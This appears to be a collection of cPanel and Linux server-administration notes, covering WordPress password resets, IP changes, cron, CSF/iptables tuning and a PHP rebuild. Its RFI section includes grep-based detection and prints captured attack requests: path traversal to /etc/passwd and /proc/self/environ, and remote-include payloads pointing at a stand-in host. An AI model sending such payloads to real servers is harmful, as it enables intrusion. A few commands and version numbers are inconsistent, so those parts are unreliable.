How to Reset a Wordpress Password

If you have forgotten your wordpress credentials, or possibly have had your wordpress install compromised; you may find yourself needing to change your admin username and/or password to regain access to your site.

Reset a User's password through MySQL

• Log in to your wordpress database using MySQL's command line interface
• Find the ID of the user's password you want to change

SELECT ID, user_login, user_pass FROM wp_users;

• Change that user's password to a new one

UPDATE wp_users SET user_pass=MD5('newstrongpassword') WHERE ID = usersID;

Reset a User's Password through phpMyAdmin

If you have Plesk or cPanel, phpmyadmin should be included by default. Open it up for the domain and database that your wordpress site belongs on. If you don't remember the database name, look in your wp-config.php for a line similar to this:

define('DB_NAME', 'wordpress_blog');

In this example, "wordpress_blog" is the name of the database.

• Once you're logged in to phpmyadmin, click on the wp_users table.
• Make sure you are on the browse screen
• Find the username you want to change the password for
• Click edit on that username
• Enter in your new password in the Value field of the user_pass line
• Select "MD5" from the dropdown under the Functions column for the user_pass line
• Click Go at the bottom of the screen, and then you should be able to log in with the new password

How to change the primary IP addres of a cPanel server

Log in to SSH, and do the following:

Edit /etc/sysconfig/network-scripts/ifcfg-eth0

Change the IPADDR and GATEWAY lines to match the new IP and Gateway for the new ip


Edit /etc/sysconfig/network
Change the GATEWAY line here if it does not exist in the ifcfg-* file.


Edit /etc/ips
Remove the new primary IP from this file if it is present
Add the old primary IP to this file with the format ::


Edit /var/cpanel/mainip
Replace the old primary IP with the new primary IP


Edit /etc/hosts
Replace the old primary IP with the new one if needed. The hostname's dns will need to be updated too


Restart the network service to make the new IP the primary
service network restart
Note: You're probably going to be disconnected at this point, and have to log in to ssh using the new primary ip.


Restart the ipaliases script to bring up the additional IP
service ipaliases restart


Run ifconfig and make sure all IPs show up correctly


Update the cpanel license to the new primary IP


Verify you can still log in to WHM and there is no license warning
Verify cPanel

Linux Crontab

Linux Cron utility is an effective way to schedule a routine background job at a specific time and/or day on an on-going basis.

Linux Crontab Format


MIN HOUR DOM MON DOW CMD
*        *           *        *       *         

Table: Crontab Fields and Allowed Ranges (Linux Crontab Syntax)

Field	Description	Allowed Value
MIN	Minute field	0 to 59
HOUR	Hour field	0 to 23
DOM	Day of Month	1-31
MON	Month field	1-12
DOW	Day Of Week	0-6
CMD	Command	Any command to be executed.

Remote File Inclusion (RFI) attacks

Remote File Inclusion (RFI) attacks

Remote File Inclusion (RFI) is a technique used to attack Web applications from a remote computer. Such attacks allow malicious users to run their own code on a vulnerable Web server by including code from a URL to a remote server. When an application executes the malicious code, it may lead to a back-door exploit or technical information retrieval. This is an application vulnerability that is a result of insufficient validation of user inputs.



Disable allow_url_fopen in php.ini by setting it to 0

Enable safe_mode and set open_basedir restrictions (if you know what you're doing - it's not really that safe!)

Lockdown the server environment to prevent the server from making new outbound requests

Using Apache mod_rewrite is also an effective security measure to prevent RFI attacks. To use it, in your .htaccess, add the following lines:

RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)
RewriteRule ^(.+)$ - [F,L]

The RewriteCond will match the found pattern, and the RewriteRule determines where to redirect the attacker. Here, the F and L options will block the request.

There are two php.inioptions you can set, which control different aspects of file handling, and work to prevent RFI:

allow_url_fopen=off
allow_url_include=off

The magic_quotes directives represent PHP functionality that automatically escapes quotes passed by the user to the application. For example, in php.ini, set magic_quotes_gpc=On to automatically escape all single and double quotes, backslashes and NULLs with a backslash, in GETs, POSTs and cookies. The other magic quote directive (magic_quotes_runtime=On) will escape quotes for a select list of functions.

Apache log poisoning with LFI




 Apache normally uses two log files: access_log, which contains all valid requests to the Web server, and error_log, which contains error messages.

/etc/httpd/logs/, /opt/lampp/logs/, /usr/local/apache/log, /usr/local/apache/logs/, /usr/local/etc/httpd/logs/, /usr/local/www/logs/thttpd_log, /var/apache/logs/, /var/log/apache/, /var/log/apache-ssl/, /var/log/httpd/, /var/log/httpsd/ssl.access_log


RFI Detection

Just a few commands to find out who's knocking. Feel free to expand on what's here as new RFI attacks are discovered.


grep -hr '\.\.\/\.\.\/' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

grep -hr '\/etc\/passwd' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

Real World Output (target domain omitted to protect the innocent):
~~~~~~~~~`
208.158.248.5 - example.com - "//lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
207.191.225.14 - example.com- "/ssa-pampanga-pg-wisdom-v-13xSmAeUo2o.html/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
207.191.225.14 - example.com - "/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
67.207.138.14 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
21.26.32.199 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
~~~~~~~~~~~




grep -hr 'SERVEQDOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

207.191.225.14 - example.com - "/?_SERVEQDOCUMENT_ROOT=http://www.some-RFI-rooted-site.or.kr/bbs/data/zfxid1.txt?"

grep -hr 'DOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

21.206.20.162 - example.com - "///?_SERVER[DOCUMENT_ROOT]=http://some-RFI-rooted-site.ca/bbs//nyawa.txt??"
10.45.14.165 - example.com - "/%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.some-RFI-rooted-site.com.au/nGagLiks/myfiles/zfxid1.txt?"

grep -hr '\.txt??' /usr/local/apache/logs/*_log | grep -v '\/robots.txt' | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

10.45.14.165 - example.com- "//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://some-RFI-rooted-site.co.kr/plugins/logs/gue/fx29id.txt??"
21.206.20.162 - example.com- "/ashop/catalogue.php?cat=http://www.some-RFI-rooted-site.com//pdf/1.txt??"


With such a vulnerability, attackers can execute any binary on the server like starting a telnet server, logging in to it with the privileges of a Web server user, performing exploits to gain root access, and perhaps attacking other hosts that are reachable from the compromised server.


Reference

https://documentation.cpanel.net/display/CKB/PHP+Security+Concepts

Linux command verifying CMS version on cPanel server

Wordpress version:

 find /home/*/public_html/ -type f -iwholename "*/wp-includes/version.php" -exec grep -H "\$wp_version =" {} \;

 Joomla! 1/2/3 version and release:

 Linux/cPanel:

find /home/*/public_html/ -type f \( -iwholename '*/libraries/joomla/version.php' -o -iwholename '*/libraries/cms/version.php' -o -iwholename '*/libraries/cms/version/version.php' \) -print -exec perl -e 'while (<>) { $release = $1 if m/ \$RELEASE\s+= .([\d.]+).;/; $dev = $1 if m/ \$DEV_LEVEL\s+= .(\d+).;/; } print qq($release.$dev\n);' {} \; && echo "-"

Drupal version: 

Linux/cPanel:

find /home/*/public_html/ -type f -iwholename "*/modules/system/system.info" -exec grep -H "version = \"" {} \;

 Linux/Plesk:

How to prevent DoS attack on a cPanel server

Check and block wordpress and xmlrc attack on a cPanel server


if you are seeing a lot of access to wp-login.php , you can conclude it as a wordpress attack. The below script will show you the sorted list of accessing ip’s to wp-login


====
-----------

egrep 'wp-login.php' /usr/local/apache/domlogs/* | grep -v ftp_log | awk -F : '{print $2}' | awk '{print $1}' | sort | uniq -c | sort -n

====
-----------
we can get the acces log IP from the below script,

grep -r "xx/Aug/2014" /usr/local/apache/domlogs/ | grep "xmlrpc.php" | awk '{ print $1 }' | cut -d : -f2 | sort | uniq -c | sort -n > /root/testwp

-----------
grep wp-login.php /usr/local/apache/domlogs/* grep “16/Jan/2013:03″|awk '{print $1}' | cut -d: -f2 | sort | uniq -c |sort -n | tail



CSF tuning 

vi /etc/csf/csf.conf
----
# To disable this feature, set this to 0
CT_LIMIT = "50"
----


Where 50 is the maximum number of connections from an IP address. You need to specify the port number also.



vi /etc/csf/csf.conf
----
# Leave this option empty to count all ports against CT_LIMIT
CT_PORTS = "80,53,22"
----


Also we can use other CT options .

CT_INTERVAL = "30"
CT_BLOCK_TIME = "1800"



IPTable rule:

iptables -A INPUT -p tcp --dport 80 -m limit --limit 25/minute --limit-burst 100 -j ACCEPT

------------------------
-A : Append
-p : Protocol
--dport : For ports
-m limit : To limit iptables extension
--limit 25/minute : Defines maximum of 25 connection per minute.
--limit-burst 100 : The limit/minute will be enforced only after the total number of connection have reached the limit-burst level, ie 100 here
-j : Target

--------------------------

Running Multiple PHP 5 Versions

Cpanel does not support this via direct easy apache.





To my knowledge you either need to do this manually or use CloudLinux, which offers a an addon for this purpose.


For cloud linux please follow the steps below.

http://docs.cloudlinux.com/index.html?installation.html

NB: You must have cagefs & lvemgr for this to work

http://docs.cloudlinux.com/index.html?cagefs.html

Recompile and install the default PHP (Optional)

If the existing installation is fine and has the necessary modules , then you can skip this step. Otherwise you need to recompile it using :D

/scripts/easyapache

Once it is done. You can proceed with the new PHP 5.4.14


Step 1:

Download the source file

mkdir /usr/local/src/php_source

cd /usr/local/src/php_source
wget http://in2.php.net/get/php-5.4.8.tar.gz/from/us1.php.net/mirror

Extract the  cource
tar -xvf php-5.4.14.tar.bz2

You can get the configuration options for the new install from the existing installation using the following command
 php -i |grep configure|sed 's/Configure Command =>  //g'|sed "s/'//g"

Once it is available modify it and make sure the installation path --prefix is specified and is compiled as cgi using the option --enable-cgi. In this case I am using the installation path as --prefix=/usr/local/php54
Make sure to remove the configuration parameter for apxs  ie   --with-apxs2=/usr/local/apache/bin/apxs
The final configuration option for new install will look like the following

 ./configure  --disable-fileinfo --disable-phar --enable-bcmath --enable-calendar --enable-libxml --enable-mbstring --enable-pdo=shared --enable-soap --enable-sockets --enable-wddx --enable-zend-multibyte --enable-zip --prefix=/usr/local/php54 --enable-cgi --with-bz2 --with-curl=/opt/curlssl/ --with-curlwrappers --with-freetype-dir=/usr --with-gd --with-gettext --with-imap=/opt/php_with_imap_client/ --with-imap-ssl=/usr --with-jpeg-dir=/usr --with-kerberos --with-libdir=lib64 --with-libexpat-dir=/usr --with-libxml-dir=/opt/xml2/ --with-mcrypt=/opt/libmcrypt/ --with-mm=/opt/mm/ --with-mysql=/usr --with-mysql-sock=/var/lib/mysql/mysql.sock --with-mysqli=/usr/bin/mysql_config --with-openssl=/usr --with-openssl-dir=/usr --with-pcre-regex=/opt/pcre --with-pdo-mysql=shared --with-pdo-sqlite=shared --with-pic --with-png-dir=/usr --with-pspell --with-tidy=/opt/tidy/ --with-xmlrpc --with-xpm-dir=/usr --with-xsl=/opt/xslt/ --with-zlib --with-zlib-dir=/usr

 Once the configuration is complete. Make the compilation using the following command

 make
Now proceed with the installation

make install

Once the installation is complete you will get an output like the following one

# make install
Installing shared extensions:     /usr/local/php54/lib/php/extensions/no-debug-non-zts-20100525/
Installing PHP CLI binary:        /usr/local/php54/bin/
Installing PHP CLI man page:      /usr/local/php54/php/man/man1/
Installing PHP CGI binary:        /usr/local/php54/bin/

Once the installation is completed, confirm the version by using the command

#  /usr/local/php54/bin/php -v
PHP 5.4.14 (cli) (built: May  3 2013 12:21:56)
Copyright (c) 1997-2013 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2013 Zend Technologies

Now we need to configure it for web server access

It is performed through specifying the new PHP handler for php file

AddHandler specifically is meant to communicate with the server. It assigns or "maps" a handler to the file extension you specify, giving the server instructions on how to deal with it. For example, AddHandler could be used to activate a particular file type, which is why it must communicate with the server.

Eg:

AddHandler application/x-httpd-php54 .php
The AddHandler directive tells Apache that whenever it encounters a file with a .php extension, it should mark it as having a MIME type of application/x-httpd-php54.


Action application/x-httpd-php54 /cgi-sys/php54
The Action directive tells Apache that whenever it encounters a file of type application/x-httpd-php53 it should pass it to the script /cgi-sys/php54 and capture the output.

Assume that you are working on default cPanel server.

Open the file /usr/local/apache/conf/includes/pre_virtualhost_global.conf and add the following entries to enable

Add the following lines to the above file and save

Action application/x-httpd-php54 /cgi-sys/php54
 AddType application/x-httpd-php54 .php54

To make cPanel skip the .htacces scan and remove the mime types, do the  followin

/usr/local/cpanel/bin/apache_conf_distiller --update
touch /var/cpanel/easy_skip_update_php_mime_types

vi /usr/local/cpanel/cgi-sys/php54
Add the following contents to the above file and save
#!/bin/sh
exec /usr/local/php54/bin/php-cgi
Setting Permissions
chown root:wheel /usr/local/cpanel/cgi-sys/php54
chmod +x /usr/local/cpanel/cgi-sys/php54
Soft-linking for command-line executions:
ln -s /usr/local/php54/bin/php-cgi /usr/local/bin/php54

Copying php.ini from build folder
mv /usr/local/php_source/php.ini-production /usr/local/php54/lib/php.ini
You need to restart httpd after the configuration
/etc/init.d/httpd restart
Now everything is set. If you want to enable php5.3 for a particular account, create a .htaccess file as mentioned below.

nano -w /home/$username/public_html/.htaccess
AddHandler application/x-httpd-php54 .php

chown $username:$username /home/$username/public_html/.htaccess
chmod 644 /home/$username/public_html/.htaccess